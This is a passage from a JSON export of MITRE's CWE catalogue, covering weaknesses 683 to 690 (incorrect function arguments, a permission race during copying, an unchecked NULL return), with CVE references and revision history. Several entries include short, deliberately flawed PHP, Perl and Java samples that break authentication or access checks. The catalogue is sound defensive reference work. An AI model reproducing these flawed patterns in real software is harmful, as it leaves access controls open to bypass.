Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"683":{"attr":{"@_ID":"683","@_Name":"Function Call With Incorrect Order of Arguments","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies the arguments in an incorrect order, leading to resultant weaknesses.","Extended_Description":"While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers or types of arguments, such as format strings in C. It also can occur in languages or environments that do not enforce strong typing.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This problem typically occurs when the programmer makes a typo, or copy and paste errors."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use the function, procedure, or routine as specified."},{"Phase":"Testing","Description":"Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-62"},"Intro_Text":"The following PHP method authenticates a user given a username/password combination but is called with the parameters in reverse order.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function authenticate($username, $password) {}authenticate($_POST[\'password\'], $_POST[\'username\']);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// authenticate user"}},"xhtml:br":["",""]}}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-7049","Description":"Application calls functions with arguments in the wrong order, allowing attacker to bypass intended access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7049"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"684":{"attr":{"@_ID":"684","@_Name":"Incorrect Provision of Specified Functionality","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code does not function according to its published specifications, potentially leading to incorrect usage.","Extended_Description":"When providing functionality to an external party, it is important that the software behaves in accordance with the details specified. When requirements of nuances are not documented, the functionality may produce unintended behaviors for the caller, possibly leading to an exploitable state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that your code strictly conforms to specifications."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"PRE09-C","Entry_Name":"Do not replace secure functions with less secure functions"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Provide Specified Functionality","attr":{"@_Date":"2011-03-29"}}}},"685":{"attr":{"@_ID":"685","@_Name":"Function Call With Incorrect Number of Arguments","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies too many arguments, or too few arguments, which may lead to undefined behavior and resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This problem typically occurs when the programmer makes a typo, or copy and paste errors."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Detection_Methods":{"Detection_Method":{"Method":"Other","Description":"While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers of arguments, such as format strings in C. It also can occur in languages or environments that do not require that functions always be called with the correct number of arguments, such as Perl."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP37-C","Entry_Name":"Call functions with the correct number and type of arguments","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO47-C","Entry_Name":"Use valid format strings","Mapping_Fit":"Imprecise"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"686":{"attr":{"@_ID":"686","@_Name":"Function Call With Incorrect Argument Type","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies an argument that is the wrong data type, which may lead to resultant weaknesses.","Extended_Description":"This weakness is most likely to occur in loosely typed languages, or in strongly typed languages in which the types of variable arguments cannot be enforced at compilation time, or where there is implicit casting.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP37-C","Entry_Name":"Call functions with the correct number and type of arguments","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO47-C","Entry_Name":"Use valid format strings","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS34-C","Entry_Name":"Do not call putenv() with a pointer to an automatic variable as the argument"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR37-C","Entry_Name":"Arguments to character handling functions must be representable as an unsigned char"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"687":{"attr":{"@_ID":"687","@_Name":"Function Call With Incorrectly Specified Argument Value","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies an argument that contains the wrong value, which may lead to resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Static Analysis","Description":"This might require an understanding of intended program behavior or design to determine whether the value is incorrect."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-63"},"Intro_Text":"This Perl code intends to record whether a user authenticated successfully or not, and to exit if the user fails to authenticate. However, when it calls ReportAuth(), the third argument is specified as 0 instead of 1, so it does not exit.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub ReportAuth {}sub PrivilegedFunc{}","xhtml:div":[{"#text":"my ($username, $result, $fatal) = @_;PrintLog(\\"auth: username=%s, result=%d\\", $username, $result);if (($result ne \\"success\\") &amp;&amp; $fatal) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"die \\"Failed!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"my $result = CheckAuth($username);ReportAuth($username, $result, 0);DoReallyImportantStuff();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["","",""]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM04-C","Entry_Name":"Do not perform zero length allocations"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"When primary, this weakness is most likely to occur in rarely-tested code, since the wrong value can change the semantic meaning of the program\'s execution and lead to obviously-incorrect behavior. It can also be resultant from issues in which the program assigns the wrong value to a variable, and that variable is later used in a function call. In that sense, this issue could be argued as having chaining relationships with many implementation errors in CWE.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Detection_Factors, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"688":{"attr":{"@_ID":"688","@_Name":"Function Call With Incorrect Variable or Reference as Argument","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a function, procedure, or routine, but the caller specifies the wrong variable or reference as one of the arguments, which may lead to undefined behavior and resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"628","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This problem typically occurs when the programmer makes a typo, or copy and paste errors."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Detection_Methods":{"Detection_Method":{"Method":"Other","Description":"While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers of arguments, such as format strings in C. It also can occur in loosely typed languages or environments. This might require an understanding of intended program behavior or design to determine whether the value is incorrect."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the software. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-64"},"Intro_Text":"In the following Java snippet, the accessGranted() method is accidentally called with the static ADMIN_ROLES array rather than the user roles.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private static final String[] ADMIN_ROLES = ...;public boolean void accessGranted(String resource, String user) {}private boolean void accessGranted(String resource, String[] userRoles) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"String[] userRoles = getUserRoles(user);return accessGranted(resource, ADMIN_ROLES);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// grant or deny access based on user roles"}}]}}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-2548","Description":"Kernel code specifies the wrong variable in first argument, leading to resultant NULL pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2548"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"689":{"attr":{"@_ID":"689","@_Name":"Permission Race Condition During Resource Copy","@_Abstraction":"Compound","@_Structure":"Composite","@_Status":"Draft"},"Description":"The product, while copying or cloning a resource, does not set the resource\'s permissions or access control until the copy is complete, leaving the resource exposed to other spheres while the copy is taking place.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"362","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"732","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":{"xhtml:p":["Common examples occur in file archive extraction, in which the product begins the extraction with insecure default permissions, then only sets the final permissions (as specified in the archive) once the copy is complete. The larger the archive, the larger the timing window for the race condition.","This weakness has also occurred in some operating system utilities that perform copies of deeply nested directories containing a large number of files.","This weakness can occur in any type of functionality that involves copying objects or resources in a multi-user environment, including at the application level. For example, a document management system might allow a user to copy a private document, but if it does not set the new copy to be private as soon as the copy begins, then other users might be able to view the document while the copy is still taking place."]}}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0760","Description":"Archive extractor decompresses files with world-readable permissions, then later sets permissions to what the archive specified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0760"},{"Reference":"CVE-2005-2174","Description":"Product inserts a new object into database before setting the object\'s permissions, introducing a race condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2174"},{"Reference":"CVE-2006-5214","Description":"Error file has weak permissions before a chmod is performed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5214"},{"Reference":"CVE-2005-2475","Description":"Archive permissions issue using hard link.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2475"},{"Reference":"CVE-2003-0265","Description":"Database product creates files world-writable before initializing the setuid bits, leading to modification of executables.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0265"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"27"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Permission Races&#34;, Page 533"}}},"Notes":{"Note":{"#text":"Under-studied. It seems likely that this weakness could occur in any situation in which a complex or large copy operation occurs, when the resource can be made available to other spheres as soon as it is created, but before its initialization is complete.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"690":{"attr":{"@_ID":"690","@_Name":"Unchecked Return Value to NULL Pointer Dereference","@_Abstraction":"Compound","@_Structure":"Chain","@_Status":"Draft"},"Description":"The product does not check for an error after calling a function that can return with a NULL pointer if the function fails, which leads to a resultant NULL pointer dereference.","Extended_Description":"While unchecked return value weaknesses are not limited to returns of NULL pointers (see the examples in CWE-252), functions often return NULL to indicate an error status. When this error condition is not checked, a NULL pointer dereference can occur.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"StartsWith","@_CWE_ID":"252","@_View_ID":"709","@_Chain_ID":"690"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"476","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"A typical occurrence of this weakness occurs when an application includes user-controlled input to a malloc() call. The related code might be correct with respect to preventing buffer overflows, but if a large value is provided, the malloc() will fail due to insufficient memory. This problem also frequently occurs when a parsing routine expects that certain elements will always be present. If malformed input is provided, the parser might return NULL. For example, strtok() can return NULL."}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart"},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Read Memory","Modify Memory"],"Note":"In rare circumstances, when NULL is equivalent to the 0x0 memory address and privileged code can access it, then writing or reading memory is possible, which may lead to code execution."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"This typically occurs in 